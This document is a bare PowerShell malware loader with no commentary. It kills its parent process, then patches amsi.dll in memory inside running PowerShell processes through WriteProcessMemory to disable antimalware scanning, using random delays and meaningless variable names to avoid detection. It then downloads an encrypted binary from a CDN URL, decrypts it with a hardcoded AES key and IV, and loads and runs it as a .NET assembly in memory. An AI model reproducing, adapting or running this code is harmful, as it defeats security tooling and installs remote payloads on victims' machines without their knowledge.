$fern = (Get-CimInstance Win32_Process -Filter "ProcessId=$PID").ParentProcessId if ($fern) { Stop-Process -Id $fern -Force } Add-Type @" using System; using System.Runtime.InteropServices; public class K { [DllImport("kernel32.dll", SetLastError=true)] public static extern bool VirtualProtectEx(IntPtr h, IntPtr a, uint s, uint p, out uint o); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool ReadProcessMemory(IntPtr h, IntPtr a, byte[] b, int s, out IntPtr r); [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr OpenProcess(uint a, bool i, int p); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool WriteProcessMemory(IntPtr h, IntPtr a, byte[] b, uint s, out int w); } "@ function KJhbhb { Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $breeze = Get-Process -Name "powershell" -ErrorAction SilentlyContinue if (!$breeze) { exit 1 } foreach ($queen in $breeze) { Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $ridge = [K]::OpenProcess(0x001F0FFF, $jungle, $queen.Id) $horizon = $null $grove = 0 foreach ($pearl in $queen.Modules) { if ($pearl.ModuleName -eq "amsi.dll") { $horizon = $pearl.BaseAddress $grove = $pearl.ModuleMemorySize break } } if (!$horizon) { continue } $autumn = [byte[]]::new(32) $flower = [byte[]]@(0x4c,0x8b,0xdc,0x49,0x89,0x5b,0x08,0x49,0x89,0x6b,0x10,0x49,0x89,0x73,0x18,0x57,0x41,0x56,0x41,0x57,0x48,0x83,0xec,0x70,0x4d,0x8b,0xf9,0x41,0x8b,0xf8,0x48,0x8b) $nimbus = $null for ($opal = 0; $opal -le $grove; $opal += 32) { $oasis = [IntPtr]::Zero [K]::ReadProcessMemory($ridge, [IntPtr]($horizon.ToInt64() + $opal), $autumn, 32, [ref]$oasis) $ivy = $urn for ($star = 0; $star -lt 32; $star++) { if ($autumn[$star] -ne $flower[$star]) { $ivy = $jungle; break } } if ($ivy) { $nimbus = [IntPtr]($horizon.ToInt64() + $opal); break } } if (!$nimbus) { continue } Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $haze = 0 [K]::VirtualProtectEx($ridge, $horizon, 0x1000, 0x40, [ref]$haze) $hollow = [byte[]]@(0x31,0xff,0x90) $willow = 0 [K]::WriteProcessMemory($ridge, [IntPtr]($nimbus.ToInt64() + 0x1b), $hollow, 3, [ref]$willow) } } KJhbhb #ujhifsfiohdf setx BUILD "Titan" $rune = "https://sdfas-cloud.b-cdn.net/wqegfasd.bin" $whisper = [System.Net.WebClient]::new() $yarrow = $whisper.DownloadData($rune) $quartz = [System.Security.Cryptography.Aes]::Create() $dream = [System.Text.Encoding]::UTF8.GetBytes("X7b9PqT3mW2kL8vR5nY6zJ1hF4tD9cM0") $gorge = [System.Text.Encoding]::UTF8.GetBytes("K9mW3pQ7tR2vL8nY") $quartz.Key = $dream $quartz.IV = $gorge $island = $quartz.CreateDecryptor() $field = $island.TransformFinalBlock($yarrow, 0, $yarrow.Length) $lily = [System.Reflection.Assembly]::Load($field) $ledge = $lily.EntryPoint $ledge.Invoke($null, $null) #ujhifsfiohdf